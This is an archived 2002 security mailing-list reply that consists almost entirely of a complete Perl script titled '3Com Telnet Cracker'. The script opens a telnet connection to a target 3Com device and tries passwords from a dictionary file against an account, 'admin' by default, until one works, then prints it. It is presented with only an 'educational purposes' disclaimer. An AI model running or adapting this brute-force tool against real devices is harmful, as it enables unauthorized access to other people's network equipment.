Re: 3Com TelnetD COMPLETE CODE

From: bladeblaat_private
Date: Sat Oct 19 2002 - 04:48:19 PDT

Next message: eD\\/ARd0 F/\\KEn^M3: "Re: KaZaA"

Previous message: Max: "Full zone information disclosure on top level domain name servers"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) In-Reply-To: <003d01c10b13$c41cf200$0100a8c0at_private> #!/usr/bin/perl -w ######################################################## # # # 3Com Telnet Cracker v0.1b # # ------------------------- # # # # Telnet implementation arcording to RFC 854 # # # # written 2001 by Siberian [www.sentry-labs.com] # # # # Tested with: # # Active Perl (Windows NT) # # Perl 5.stable (Slackware 3.6 & 7.1) # # # # This Software is published under GPL v2 # # # # FOR EDUCATIONAL PURPOUSE ONLY! # # # # SRL can't be held responsible for any damgae caused # # by the software, direct or inderectly to anything # # or anyone. # # # ######################################################## use Socket; sub guesspass { $i=1; $userh = $userf; $userf = join '', $userf, chr(13), chr(10); recv(SOCK,$ol,1,0); while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){ recv(SOCK,$ol,1,0); } while(defined($passwd = <FILE1>)) { chop($passwd); print "."; while($i != 3) { if($ol eq "L"){ send(SOCK,$userf,0); } if($ol eq "P") { $passwd = join '', $passwd, chr(13), chr(10); send(SOCK,$passwd,0); } recv(SOCK,$ol,1,0); while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){ recv(SOCK,$ol,1,0); } if($ol eq "M") { print "\n\nPassword for $userh is $passwd\n"; exit 0; } $i++ } $i=1; } print "\n\nIt's sad but true, you failed.\n"; } print "\n3Com Hardware Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n\n"; print "Get the latest Version at www.sentry-labs.com\n\n"; $remote = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)"; $passf = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)"; $userf = shift || ($userf = "admin"); $iaddr = inet_aton($remote) or die "No target host computer found!"; $paddr = sockaddr_in(23, $iaddr); $prot = getprotobyname('tcp'); socket(SOCK, AF_INET, SOCK_STREAM, $prot) or die "socket: $!"; connect(SOCK, $paddr) || die "Can't connect to target host!"; open(FILE1, "$passf") || die "Can't open Password list!"; recv(SOCK,$ol,1,0); $bs = join '', chr(10),chr(13),chr(10); send(SOCK, $bs, 0); guesspass(); close(FILE1); close(SOCK); exit 0;

Next message: eD\\/ARd0 F/\\KEn^M3: "Re: KaZaA"
Previous message: Max: "Full zone information disclosure on top level domain name servers"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Oct 19 2002 - 11:54:01 PDT